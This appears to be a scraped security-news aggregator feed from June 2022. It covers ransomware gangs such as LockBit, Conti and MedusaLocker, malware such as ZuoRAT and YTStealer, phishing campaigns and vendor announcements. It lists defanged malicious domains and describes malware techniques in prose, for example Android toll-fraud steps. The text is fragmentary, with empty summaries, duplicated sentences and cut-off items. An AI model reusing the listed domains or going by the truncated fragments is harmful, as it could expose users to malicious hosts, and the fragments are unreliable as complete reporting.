Known attacks involving Conti compared to known attacks involving alleged Conti “brands” BlackBasta, BlackByte, and KaraKurt The resurgent KaraKurt extortion group has a new leak site Trends Most software, even malware, trends towards “feature completeness”—a point where adding new features adds little, if anything, to its usefulness. Known ransomware attacks by group, June 2022 Known ransomware attacks by country, June 2022 Known ransomware attacks by industry sector, June 2022 LockBit Without fanfare, LockBit has become the dominant force in ransomware this year. Conti As expected, the last public vestige of the Conti ransomware gang, its leak site, disappeared in June, after a few weeks of inactivity. "NXM Labs unveiled its NXM Autonomous Security platform that prevents hackers from gaining unauthorized access to commercial, industrial, medical, or consumer internet of things (IoT) devices. Tested in collaboration with the Jet Propulsion Laboratory (JPL), California Institute of Technology (Caltech), NXM successfully demonstrated the ability of its technology to enable future Mars rovers to automatically defend themselves and recover from cyberattacks. Caltech manages JPL on behalf of the National Aeronautics and Space Administration (NASA). NXM’s … More
The post NXM Autonomous Security platform protects space infrastructure and IoT devices from cyberattacks appeared first on Help Net Security.
"Autosummary:
"Ransomware detections in the first quarter of this year doubled the total volume reported for 2021, according to the latest quarterly Internet Security Report from the WatchGuard Threat Lab. Researchers also found that the Emotet botnet came back in a big way, the infamous Log4Shell vulnerability tripled its attack efforts and malicious cryptomining activity increased. Although findings from the Threat Lab’s Q4 2021 report showed ransomware attacks trending down year over year, that all changed … More
The post EMEA continues to be a hotspot for malware threats appeared first on Help Net Security.
"Autosummary:
Other key findings from this Internet Security Report include: Log4Shell makes its debut on the top 10 network attacks list Publicly disclosed in early December 2021, the Apache Log4j2 vulnerability, also known as Log4Shell, debuted on the top 10 network attack list fashionably late this quarter. “Based on the early spike in ransomware this year and data from previous quarters, we predict 2022 will break our record for annual ransomware detections,” said Corey Nachreiner, chief security officer at WatchGuard. "Researchers detailed a new information-stealing malware, dubbed YTStealer, that targets YouTube content creators. Intezer cybersecurity researchers have detailed a new information-stealing malware, dubbed YTStealer, that was developed to steal authentication cookies from YouTube content creators. The malware is highly likely available as a service on the Dark Web. Upon executing the malware, it performs some environment […]
The post YTStealer info-stealing malware targets YouTube content creators appeared first on Security Affairs.
"Autosummary:
Once gained access to the YouTube studio, the malware grabs information about the user’s channels, including the channel name, the number of subscribers, their creation date, its verification status and if it is monetized. A lot of the droppers are disguised as installers for legitimate video editing software, such as Adobe Premiere Pro, Filmora, and HitFilm Express; audio tools like Ableton Live 11 and FL Studio; game mods for Counter-Strike: Global Offensive and Call of Duty; and cracked versions of security products. "Autosummary:
The company"s Head Of Security, Cory Hardman, said that an employee of Customer.io, the platform"s email delivery vendor, downloaded email addresses belonging to OpenSea users and newsletter subscribers. "Autosummary:
Integrating directly into development tools, workflows, and automation pipelines, Snyk makes it easy for teams to find, prioritize, and fix security vulnerabilities in code, dependencies, containers, and infrastructure as code. "Autosummary:
"Autosummary:
Attacker Skill and Persistence The skills of the attackers and the skills of the defenders – plus some elements of luck – generally determine the possible extent to which an attack could progress: Low skills: Some attackers may be skilled at attacking organizations with lagging security practices but will often meet their match in organizations that have robust defenses Some attackers may be skilled at attacking organizations with lagging security practices but will often meet their match in organizations that have robust defenses Wrong skills: Attackers with skills and tooling useful in attacking traditional data centers will have trouble breaking into targets who have moved everything to the cloud Attackers with skills and tooling useful in attacking traditional data centers will have trouble breaking into targets who have moved everything to the cloud Bad luck: Organizations who are generally locked down but may have a temporary exposure which an attacker happens to stumble across Organizations who are generally locked down but may have a temporary exposure which an attacker happens to stumble across Good luck: Organizations who have left a persistent opening (e.g., open RDP access to the outside in an AWS enclave) may have a run of good luck as no attacker encounters it Attacker Goal Attack groups may also specialize in leak-centered vs. operation-centered goals. Takeaways You should tabletop various scenarios covering attackers pursuing both leak-centered and operations-centered goals and consider your reactions to partial and complete success by the attackers: Know the extent of your cyber insurance policy and what limitations it has. "If the promise of a cash prize in return for answering a few questions sounds like a deal that is too good to be true, that’s because it is
The post Costco 40th anniversary scam targets WhatsApp users appeared first on WeLiveSecurity
"Autosummary:
Keep away from parent Costco surveys, giveaways or out-of-the-blue and too-good-to-be-true offers, even if the links are shared by trusted contacts.For example, the website set up by the scammers features glowing reviews and feedback from past “winners”, which, again, is not an unusual sight in these types of social engineering campaigns. "Autosummary:
The resulting shellcode (Cyberint) After the infection process has been completed, XFiles begins typical info-stealer malware operations like targeting cookies, passwords, and history stored in web browsers, cryptocurrency wallets, taking screenshots, and looking for Discord and Telegram credentials. "Researchers have analyzed a long running campaign that compromises SOHO routers to further penetrate and eavesdrop on networks.
The post ZuoRAT is a sophisticated malware that mainly targets SOHO routers appeared first on Malwarebytes Labs.
"Autosummary:
The so-called ZuoRAT campaign, which very likely started in 2020, is so sophisticated that the researchers suspect that there is a state sponsored threat actor behind it.The researchers identified infected routers of several manufacturers including popular brands like ASUS, Cisco, DrayTek, and NETGEAR. "The retail giant patched a serious flaw in its Amazon Photos app that left user access token exposed to potential attackers.
The post Amazon Photos vulnerability could have given attackers access to user files and data appeared first on Malwarebytes Labs.
"Autosummary:
That would give attackers access to a trove of information, since many of these APIs contain personal data, such as names, email addresses, and home addresses. "Autosummary:
Victims have reportedly been hit in countries around the world including the United States, UK, India, Canada, Australia, New Zealand, and UAE. "Autosummary:
Instead, according to Hardman, an employee of Customer.io – OpenSea’s email delivery vendor – abused their privileges to download OpenSea’s user email and newsletter email lists. In a blog update, OpenSea’s head of security Cory Hardman broke the bad news: “If you have shared your email with OpenSea in the past, you should assume you were impacted.” "A former Canadian government IT worker admitted to being a high-level member of the Russian cybercrime group NetWalker. A former Canadian government employee, Sebastien Vachon-Desjardins, pleaded guilty in the U.S. to charges related to his involvement with the Russian cybercrime group NetWalker. In March, the man was extradited to the United States to face charges […]
The post Ex-Canadian government employee admits to being a member of the Russian cybercrime gang NetWalker appeared first on Security Affairs.
"Autosummary:
The list of victims of the group is long, it includes Pakistan’s largest private power company K-Electric, Argentina’s official immigration agency, Dirección Nacional de Migraciones, and the University of California San Francisco (UCSF), the latter paid a $1.14 million ransom to recover its files. "Autosummary:
"Autosummary:
" After deployment, the malicious IIS module allows its operators to harvest credentials from system memory, collect information from the victims" network and infected devices, and deliver additional payloads (such as a PowerSploit-based Mimikatz reflective loader, Mimikatz SSP, ProcDump, and a legitimate Avast memory dump tool). "Actions to take today to mitigate cyber threats from ransomware:
• Prioritize remediating known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enable and enforce multifactor authentication.
Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) are releasing this CSA to provide information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim"s data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom; and th "
Autosummary:
"Autosummary:
Microsoft identified several steps in the process that typically happens with users being completely unaware: Disable the Wi-Fi connection or wait for the user to switch to a mobile network Silently navigate to the subscription page Auto-click the subscription button Intercept the OTP (if applicable) Send the OTP to the service provider (if applicable) Cancel the SMS notifications (if applicable) Disabling WiFi connection The malware starts by collecting data on the subscriber’s country and mobile network, for which Android requires no permission from the user. “Since API level 18, an application that extends the NotificationListenerService is authorized to suppress notifications triggered from other applications” - Microsoft Malware developers have a subset of three API calls they can abuse to silence SMS notifications from other applications: cancelAllNotifications() to inform the notification manager to dismiss all notifications cancelNotification(String key) to inform the notification manager to dismiss a single notification cancelNotifications(String [] keys) to inform the notification manager to dismiss multiple notifications at once Developers of toll fraud malware also implement mechanisms to keep the malicious behavior as discreet as possible. "Ocient announced it has partnered with Carahsoft to bring hyperscale data warehouse, analytics and machine learning capabilities to U.S. federal, state/local governments and higher education organizations. Carahsoft will serve as the U.S. government distributor for Ocient leveraging Carahsoft’s reseller partners and contracts including NASA Solutions for Enterprise-Wide Procurement (SEWP) V, Information Technology Enterprise Solutions – Software 2 (ITES- SW2) and OMNIA Partners, the nation’s largest cooperative purchasing organization for the public sector. In tandem with … More
The post Ocient collaborates with Carahsoft to accelerate digital transformation for U.S. government agencies appeared first on Help Net Security.
"Autosummary:
Government use cases powered by Ocient’s hyperscale data analytics solutions include: Lawful intercept and lawful intelligence Cybersecurity and anomaly detection Log and sensor data collection and analysis Weather and climate change study and reporting Geospatial calculation and analysis Ocient’s hyperscale data analytics solutions can be deployed either on-premises, in the cloud or as a managed service in the OcientCloud to consolidate multiple workloads on a single platform for maximum efficiency and security. "Good news for the victims of the Hive ransomware, Korean security researchers have released a free decryptor for some versions. Good news for the victims of the Hive ransomware, the South Korean cybersecurity agency KISA has released a free decryptor for versions from v1 till v4. “The Korea Internet & Security Agency (KISA) is distributing […]
The post Korean cybersecurity agency released a free decryptor for Hive ransomware appeared first on Security Affairs.
"Autosummary:
The results of the tests demonstrated the efficiency of the method, the master key recovered 92% succeeded in decrypting approximately 72% of the files, while the master key restored 96% succeeded in decrypting approximately 82% of the files, and the master key restored 98% succeeded in decrypting approximately 98% of the files. "Autosummary:
The Microsoft Threat Intelligence Center (MSTIC) also observed threat groups linked to the GRU, SVR, and FSB Russian intelligence services (e.g., APT28, Sandworm, Gamaredon, EnergeticBear, Turla, DEV-0586, and UNC2452/2652) intensifying their attacks against Ukraine and its allies starting with March 2022. "Autosummary:
"Skyhigh Security announced it has partnered with Gotara, a global career growth platform for women in STEM+. The program launched internally to Skyhigh Security employees this month and is a key element of the company’s leadership development program. Through the partnership, Gotara will offer personalized and confidential career advice and support guided by STAR Program advisors, designed to mentor and upskill individuals to create future leaders. Cybersecurity is currently a male-dominated field. According to a … More
The post Skyhigh Security collaborates with Gotara to increase diversity in the cybersecurity sector appeared first on Help Net Security.
"Autosummary:
“At Skyhigh Security, we are focused on anticipating the market and responding quickly to the ever-changing security landscape in a way that reduces complexity,” said Kristen Wynne, Head of People Success at Skyhigh Security. "Siemens and NVIDIA announced an expansion of their partnership to enable the industrial metaverse and increase use of AI-driven digital twin technology that will help bring industrial automation to a new level. As a first step in this collaboration, the companies plan to connect Siemens Xcelerator, the open digital business platform, and NVIDIA Omniverse, a platform for 3D-design and collaboration. This will enable an industrial metaverse with physics-based digital models from Siemens and real-time AI … More
The post Siemens and NVIDIA join forces to enable industrial metaverse appeared first on Help Net Security.
"Autosummary:
As a first step in this collaboration, the companies plan to connect Siemens Xcelerator, the open digital business platform, and NVIDIA Omniverse, a platform for 3D-design and collaboration. "Colt Technology Services’ customers now have access to an integrated full Secure Access Service Edge (SASE) solution that brings together SD WAN and SSE features, with the launch of its new Colt SASE Gateway solution. Designed for global enterprise companies, the Colt Gateway solution is based on Versa SASE which includes Versa Secure Web Gateway, a secure web access solution that offers organizations protection from malware and threats, and instant insight for policy management, along … More
The post Colt SASE Gateway protects hybrid workforce from malware and threats appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
It also powers many Microsoft products, including but not limited to Azure SQL Database, Azure Cosmos DB, Microsoft Intune, Azure Event Hubs, Azure IoT Hub, Dynamics 365, Skype for Business, Cortana, Microsoft Power BI, and multiple core Azure services. "Codenotary launched SBOM Operator for Kubernetes in both its open source Community Attestation Service, as well as Codenotary’s Trustcenter, the company’s flagship product, that mitigates the risk of software supply chain attacks by tracking all software and software dependencies running in Kubernetes. Codenotary provides the easiest way to generate SBOMs (Software Bill of Materials) of running container images and maintaining up-to-date records of all builds, and dependencies. This allows for immediate risk mitigation in the … More
The post Codenotary SBOM Operator for Kubernetes provides continuously updated info on software supply chain appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource"s host SF node and the entire cluster," Microsoft said as part of the coordinated disclosure process. "Autosummary:
Import-Export function in Thunderbird 102 (Mozilla) Another important new feature is the Spaces Toolbar, which gives users a quick way to switch between Mail, Address Book, Calendar, Tasks, and Chat. "Autosummary:
"Autosummary:
It also powers many Microsoft products, including but not limited to Azure SQL Database, Azure Cosmos DB, Microsoft Intune, Azure Event Hubs, Azure IoT Hub, Dynamics 365, Skype for Business, Cortana, Microsoft Power BI, and multiple core Azure services. "Autosummary:
"Autosummary:
If it’s valid, YTStealer also collects additional information such as: YouTube channel name Subscriber count Creation date Monetization status Official artist channel status Launching the web browser in headless mode makes the whole operation stealthy to the victim, who wouldn’t notice anything strange unless they scrutinize their running processes. "Autosummary:
"Autosummary:
"Cisco announced its expanded relationship with General Dynamics Information Technology (GDIT), a business unit of General Dynamics, to deliver Cisco Private 5G services to a broad set of government entities. GDIT has been providing comprehensive IT solutions to Federal, State, and Local governments for more than three decades, and has partnered with Cisco since the 1980s to deliver cutting-edge innovation. Combining GDIT’s extensive background and close understanding of use cases for government agencies and its … More
The post Cisco collaborates with GDIT to deliver private 5G solutions for the government sector appeared first on Help Net Security.
"Autosummary:
"The Cloud Security Alliance (CSA) announced that it has partnered with the Cyber Risk Institute (CRI) to develop an addendum to its Cloud Controls Matrix (CCM), written specifically for the financial sector. For many years, the cloud was a tempting, albeit forbidden, fruit for financial institutions. However, as cloud service providers’ (CSP) security measures have improved to accommodate most, if not all, of the financial sector’s regulatory requirements, increasing numbers of financial institutions are now … More
The post Cloud Security Alliance and Cyber Risk Institute develop CCM addendum for the financial sector appeared first on Help Net Security.
"Autosummary:
However, as cloud service providers’ (CSP) security measures have improved to accommodate most, if not all, of the financial sector’s regulatory requirements, increasing numbers of financial institutions are now looking to extend their rate of cloud adoption. "Autosummary:
"However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures." "Abnormal Security released new research that showcases a rising trend in financial supply chain compromise as threat actors impersonate vendors more than ever before. In January 2022, the number of business email compromise (BEC) attacks impersonating external third parties surpassed those impersonating internal employees for the first time and has continued to exceed traditional internal impersonations in each month since. In May 2022, external, third-party impersonation made up 52% of all BEC attacks seen by … More
The post Threat actors increasingly use third parties to run their scams appeared first on Help Net Security.
"Autosummary:
Said Hassold, “This shift to financial supply chain attacks is another important milestone in the evolution of threat actors from low-value, low-impact threats like spam to targeted high-value, high-impact attacks. "Peer Software announced the formation of a strategic alliance with Pulsar Security. Through the alliance, Peer Software will leverage Pulsar Security’s team of cyber security experts to continuously monitor and analyze emerging and evolving ransomware and malware attack patterns on unstructured data. PeerGFS, an enterprise-class software solution that eases the deployment of a modern distributed file system across multi-site, on-premises and cloud storage, will utilize these attack patterns to enable an additional layer of cyber … More
The post Peer Software partners with Pulsar Security to help enterprise customers combat ransomware attacks appeared first on Help Net Security.
"Autosummary:
"The risks presented by ransomware and cyber extortion events have likely found a place in your own security team’s discussions, and rightfully so. Ransomware attacks have proliferated in the last decade. The numbers are staggering if not overwhelming, and make it abundantly clear that ransomware attacks are not a threat that any organization, however big or small and across industries, can afford to ignore. It follows, then, that proactively protecting company assets and mitigating cyber … More
The post Detection, isolation, and negotiation: Improving your ransomware preparedness and response appeared first on Help Net Security.
"Autosummary:
Further pressure There are other means threat actors use to add pressure to negotiations outside of the ransomware attack itself, including: Implementing DDoS attacks Emailing employees directly about the attack Claiming to have data they have not actually exfiltrated to make the situation seem more dire Contacting executives or clients of the victims to make them aware of the attack Posting sensitive PII on public-facing forums or social media Leaving backdoors that make it possible for the ransomware attackers to carry out a second attack against the same organization Being the victim of a cyber extortion attack is stressful and challenging.Without a threat readiness and response plan in place, the damage of a ransomware or cyber extortion event could reverberate across your organizations, resulting in data loss, service inaccessibility, operational interruptions, loss of trust and competitive market advantage, and other costly and lasting repercussions.It is always advisable to use a professional who is familiar with threat actor engagement, ransomware attacks, and the legal obligations of ransomware victims; knowledge of current cyber extortion trends, threat actor TTPs, and threat actor groups is also important. "Autosummary:
"Autosummary:
"Autosummary:
According to the CISA, in one instance the advance persistent threat (APT) actor compromises the victim’s internal network, procures a disaster recovery network, and extracts sensitive information. "Autosummary:
ZuoRAT campaign (Lumen Black Lotus Labs) "The capabilities demonstrated in this campaign – gaining access to SOHO devices of different makes and models, collecting host and LAN information to inform targeting, sampling and hijacking network communications to gain potentially persistent access to in-land devices and intentionally stealth C2 infrastructure leveraging multi-stage siloed router to router communications – points to a highly sophisticated actor that we hypothesize has been living undetected on the edge of targeted networks for years," the researchers added. "We take a look at reports of a USB drive containing data on all 460k residents of a city in Japan, and how encryption helped lessen the risk.
The post City worker loses USB stick containing data on every resident after day of drinking appeared first on Malwarebytes Labs.
"Autosummary:
Data on the USB drive included names, gender, birthdays, and addresses.So, providing they used a good password, if someone finds the USB drive and plugs it into a computer, they won’t be able to just open up the files and view the contents.Posted: June 28, 2022 by We take a look at reports of a USB drive containing data on all 460k residents of a city in Japan, and how encryption helped lessen the risk. "Black Lotus Labs discovered a new remote access trojan (RAT) called ZuoRAT, which targets remote workers via their small office/home office (SOHO) devices, including models from ASUS, Cisco, DrayTek and NETGEAR. Overview of campaign elements ZuoRAT is part of a complex campaign that went undetected for nearly two years. The tactics, techniques and procedures (TTPs) that analysts observed bear the markings of what is likely a nation-state threat actor. The campaign included ZuoRAT – a … More
The post Researchers uncover ZuoRAT malware targeting home-office routers appeared first on Help Net Security.
"Autosummary:
Black Lotus Labs discovered a new remote access trojan (RAT) called ZuoRAT, which targets remote workers via their small office/home office (SOHO) devices, including models from ASUS, Cisco, DrayTek and NETGEAR. "Autosummary:
"Autosummary:
This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor,” said Bennett. “The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment,” Patrick Bennet wrote in a blog post. "The LockBit ransomware operators released LockBit 3.0 with important novelties, including a bug bounty program and Zcash payments. The Lockbit ransomware operation has released LockBit 3.0, which has important noveòties such as a bug bounty program, Zcash payment, and new extortion tactics. The gang has been active since at least 2019 and today it is […]
The post LockBit 3.0 introduces important novelties, including a bug bounty program appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
+4 12 CWE-502 Deserialization of Untrusted Data 6.68 7 +1 13 CWE-190 Integer Overflow or Wraparound 6.53 2 -1 14 CWE-287 Improper Authentication 6.35 4 0 15 CWE-798 Use of Hard-coded Credentials 5.66 0 +1 16 CWE-862 Missing Authorization 5.53 1 +2 17 CWE-77 Improper Neutralization of Special Elements used in a Command ("Command Injection") 5.42 5 +8 18 CWE-306 Missing Authentication for Critical Function 5.15 6 -7 19 CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer 4.85 6 -2 20 CWE-276 Incorrect Default Permissions 4.84 0 -1 21 CWE-918 Server-Side Request Forgery (SSRF) 4.27 8 +3 22 CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ("Race Condition") 3.57 6 +11 23 CWE-400 Uncontrolled Resource Consumption 3.56 2 +4 24 CWE-611 Improper Restriction of XML External Entity Reference 3.38 0 -1 25 CWE-94 Improper Control of Generation of Code ("Code Injection") 3.32 4 +3 Top exploited vulnerabilities of 2021 In April, in partnership with the FBI and the NSA, cybersecurity authorities worldwide have also published a list of the top 15 vulnerabilities frequently exploited by threat actors during 2021. "Autosummary:
In addition to the new printing features, the Windows 10 KB5014666 cumulative update preview includes twenty-six other improvements or fixes, with the two highlighted ones below: Addresses a known issue that might prevent you from using the Wi-Fi hotspot feature. "This paper provides a taxonomic classification of non-state actors in the cyberspace, analyzing their role and impact on a state’s socioeconomic structure Cyber Non-State Actors (CNSA) are key figures in our globalized world: their operations could have a significant impact on international affairs, politics, and on the economy, as much as states do. Non-state actors […]
The post NON-STATE ACTORS IN THE CYBERSPACE: AN ATTEMPT TO A TAXONOMIC CLASSIFICATION, ROLE, IMPACT AND RELATIONS WITH A STATE’S SOCIOECONOMIC STRUCTURE appeared first on Security Affairs.
"Autosummary:
Non-state actors include multinational corporations, collectives of hacktivists, non-governmental organizations (NGOs), cybercrime syndicates, private military organizations, media outlets, terrorist groups, labor unions, organized ethnic groups, lobby groups, criminal organizations, private businesses, and others. "A new RAT dubbed ZuoRAT was employed in a campaign aimed at small office/home office (SOHO) routers in North American and Europe. Researchers from Black Lotus Labs, the threat intelligence division of Lumen Technologies, have discovered a new remote access trojan (RAT) called ZuoRAT, which targets small office/home office (SOHO) devices of remote workers during COVID-19 […]
The post ZuoRAT malware hijacks SOHO Routers to spy in the vitims appeared first on Security Affairs.
"Autosummary:
“The capabilities demonstrated in this campaign — gaining access to SOHO devices of different makes and models, collecting host and LAN information to inform targeting, sampling and hijacking network communications to gain potentially persistent access to in-land devices and intentionally stealth C2 infrastructure leveraging multistage siloed router to router communications — points to a highly sophisticated actor,” the researchers concluded. "Autosummary:
Details exposed included guests" names, addresses, social security numbers, passport or driving license details, credit card and financial account information, and health-related information. "Resecurity, Inc. (USA) has identified a spike in phishing content delivered via Azure Front Door (AFD), a cloud CDN service provided by Microsoft. The identified resources in one of the malicious campaigns impersonated various services appearing to be legitimately created on the “azurefd.net” domain. This allows the bad actors to trick users and spread phishing content to intercept credentials from business applications and e-mail accounts. Notably, most phishing resources were designed to target SendGrid, Docusign … More
The post Cybercriminals use Azure Front Door in phishing attacks appeared first on Help Net Security.
"Autosummary:
gridapisignout[.]azurefd[.]net amazon-uk[.]azurefd[.]net webmailsign[.]azurefd[.]net onlinesigninlogin[.]azurefd[.]net owasapisloh[.]azurefd[.]net docuslgn-micros0ft983-0873878383[.]azurefd.net Some instances of this campaign began around the month of March 2022 and were focused primarily on Japan and hosted on Kagoya VPS resources. "The latest APWG’s Phishing Activity Trends Report reveals that in the first quarter of 2022 there were 1,025,968 total phishing attacks—the worst quarter for phishing observed to date. This quarter was the first time the three-month total has exceeded one million. There were 384,291 attacks in March 2022, which was a record monthly total. In this video for Help Net Security, Joshua Crumbaugh, CEO, PhishFirewall, talks about how cybercriminals are taking their phishing attacks to … More
The post How phishing attacks are becoming more sophisticated appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The archive file, in turn, includes an MSI installer file that displays a fake error message upon execution while stealthily deploying a DLL file ("main.dll") as well as downloading the same library from a remote server ("telemetrysystemcollection[.]com") as a fallback option. "The Ukrainian CERT-UA warns of attacks against Ukrainian telecommunications operators involving the DarkCrystal RAT. The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. The malspam messages have the topic “Free primary legal aid” use a password-protected attachment “Algorithm of actions of […]
The post Ukrainian telecommunications operators hit by DarkCrystal RAT malware appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Throughout this campaign, the threat actors also deployed other malware and tools, including the CobaltStrike framework, the PlugX backdoor, web shells, scripts for credential theft, and the open-source nextnet network scanner. "Autosummary:
The following are the various bug bounty categories offered by the LockBit 3.0 operation: Web Site Bugs: XSS vulnerabilities, mysql injections, getting a shell to the site and more, will be paid depending on the severity of the bug, the main direction is to get a decryptor through bugs web site, as well as access to the history of correspondence with encrypted companies. XSS vulnerabilities, mysql injections, getting a shell to the site and more, will be paid depending on the severity of the bug, the main direction is to get a decryptor through bugs web site, as well as access to the history of correspondence with encrypted companies.BleepingComputer LockBit 3.0 bug bounty program With the release of LockBit 3.0, the operation has introduced the first bug bounty program offered by a ransomware gang, asking security researchers to submit bug reports in return for rewards ranging between $1,000 and $1 million. "Autosummary:
The top five sectors historically targeted by Conti have been manufacturing (14%), real estate (11.1%), logistics (8.2%), professional services (7.1%), and trade (5.5%), with the operators specifically singling out companies in the U.S. (58.4%), Canada (7%), the U.K. (6.6%), Germany (5.8%), France (3.9%), and Italy (3.1%). "Iranian state-owned Khuzestan Steel Company was hit by a cyber attack that forced the company to halt its production. The Khuzestan Steel Company is one of the major steel companies owned by the Iranian government. The company was forced to halt production due to a cyberattack. According to the Associated Press, Khuzestan Steel Company has a monopoly […]
The post Cyberattack halted the production at the Iranian state-owned Khuzestan Steel company appeared first on Security Affairs.
"Autosummary:
Iran is one of the major producers of steel in the Middle East and among the top 10 in the world, according to the World Steel Association The government of Teheran, nor the Khuzestan Steel Company, has attributed the attack to a specific threat actor. "Autosummary:
VT scan results for Revive malware (Cleafy) Likely, the narrow targeting, short-term campaigns, and localized operations don"t give security vendors many opportunities to record these threats and set identification parameters so they can fly under the radar for longer. "Autosummary:
"Autosummary:
If a ransomware attack is indeed the reason behind last week"s disruption, the fact that the hackers posted all data and not just a sample, a full week after the attack occurred, could mean that the negotiations for a ransom payment have reached a dead end, or never took place. "Autosummary:
The man"s employer, a firm called BIPROGY, also apologised: "We deeply apologize to the citizens of Amagasaki, the city of Amagasaki, and all concerned for the inconvenience caused by the loss of important information entrusted to us. "Lithuania confirmed it had been hit by an “intense” cyberattack, after Vilnius imposed restrictions on the rail transit of certain goods to Kaliningrad. The government of Lithuania announced on Monday that it had been hit by an “intense” cyberattack, likely launched from Moscow, days after the Russian government protested restrictions Vilnius imposed on the rail […]
The post The government of Lithuania confirmed it had been hit by an intense cyberattack appeared first on Security Affairs.
"Autosummary:
ISPs (Tele2, Telia, Penki, Mezon, Cgates, Fastlink) airports (Vilnius Airport, Kaunas Airport, Palanga Airport, Siauliai Airport) energy companies (Ignitis Grupe, Ministry of Energy, Aedilis) major media outlets (Delfi, Nedelia, ZW) government WEB-resources (President, Ministry of Foreign Affairs, Ministry of Justice, Police) June 20th one of the units of Cyber Spetnaz called “Zarya” has announced the attack against www.mna.gov.lv which was one of the 1st targets of the new campaign. "Autosummary:
"The ATM skimming device that was installed interfered with the normal debit card transaction and allowed the theft of your card number, the PIN number associated with your card, and possibly your name and address," explains the bank"s notice to impacted customers. "Autosummary:
"Autosummary:
"Here are some of the most common ways hackers can get hold of other people’s credit card data – and how you can keep yours safe
The post 5 ways cybercriminals steal credit card details appeared first on WeLiveSecurity
"Autosummary:
At its simplest, it’s a con trick in which the hacker masquerades as a legitimate entity (e.g., a bank, an e-commerce provider, or a tech firm) to trick you into divulging your personal details, or unwittingly downloading malware. Install anti-malware, including anti-phishing protection, from a reputable security vendor on all laptops and other devices Use two-factor authentication on all sensitive accounts.Public Wi-Fi When you’re out and about it can be tempting to surf the web for free on public Wi-Fi hotspots – in airports, hotels, cafes, and other shared spaces.SMS phishing (smishing) more than doubled year-on-year in 2021, while voice phishing (vishing) also surged, according to one estimate. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: QNAP NAS devices hit by DeadBolt and ech0raix ransomware Taiwan-based QNAP Systems is warning consumers and organizations using their network-attached storage (NAS) appliances of a new DeadBolt ransomware campaign. Fake voicemail notifications are after Office365, Outlook credentials A phishing campaign using fake voicemail notifications has been and is still targeting various US-based organizations, in an attempt to grab employees’ Office365 … More
The post Week in review: Log4Shell exploitation, DevSecOps myths, 56 vulnerabilities impacting OT devices appeared first on Help Net Security.
"Autosummary:
Researchers disclose 56 vulnerabilities impacting thousands of OT devices In this video for Help Net Security, Daniel dos Santos, Head of Security Research, Forescout, talks about the 56 vulnerabilities, which impact ten vendors, including Bently Nevada, Emerson, Honeywell, JTEKT, Motorola, Omron, Phoenix Contact, Siemens, and Yokogawa.Here’s a look at the event, the featured vendors are: Arctic Wolf Networks, Bridewell, Checkmarx, Cisco, CrowdStrike, Cybereason, Hornetsecurity, (ISC)², Mimecast, Netskope, OneTrust, and Splunk. "China-linked APT Bronze Starlight is deploying post-intrusion ransomware families as a diversionary action to its cyber espionage operations. Researchers from Secureworks reported that a China-linked APT group, tracked as Bronze Starlight (APT10), is deploying post-intrusion ransomware families to cover up the cyber espionage operations. The experts observed an activity cluster involving post-intrusion ransomware such as […]
The post China-linked APT Bronze Starlight deploys ransomware as a smokescreen appeared first on Security Affairs.
"Autosummary:
The experts observed an activity cluster involving post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0. "Autosummary:
Victims listed by each ransomware operation in May 2022 (NCC Group) The notorious ransomware operation recorded a whopping 95 victims in May alone, whereas Conti, BlackBasta, Hive, and BlackCat collectively had 65. "Autosummary:
With that said, history has shown us that many people "just run things" without thinking about the ramifications, whether that be email attachments, random downloads off the Internet, cracks and warez, and game cheats. This has led to threat actors and researchers coming up with new ways of bypassing MFA, including zero-day website vulnerabilities, reverse proxies, and clever techniques, such as the Browser in the Browser attack and utilizing VNC to display remote browsers locally. "A threat actor is selling access to 50 vulnerable networks that have been compromised exploiting the recently disclosed Atlassian Confluence zero-day. A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting the recently discovered Atlassian Confluence zero-day flaw (CVE-2022-26134). The discovery was made by the Rapid7 Threat Intelligence team […]
The post Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day appeared first on Security Affairs.
"Autosummary:
A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting the recently discovered Atlassian Confluence zero-day flaw (CVE-2022-26134). "Experts warn threat actors have exploited a zero-day vulnerability in a Mitel VoIP appliance in a ransomware attack. CrowdStrike researchers recently investigated the compromise of a Mitel VOIP appliance as an entry point in a ransomware attack against the network of an organization. The attackers exploited a remote code execution zero-day vulnerability on the Mitel […]
The post Attackers exploited a zero-day in Mitel VOIP devices to compromise a network appeared first on Security Affairs.
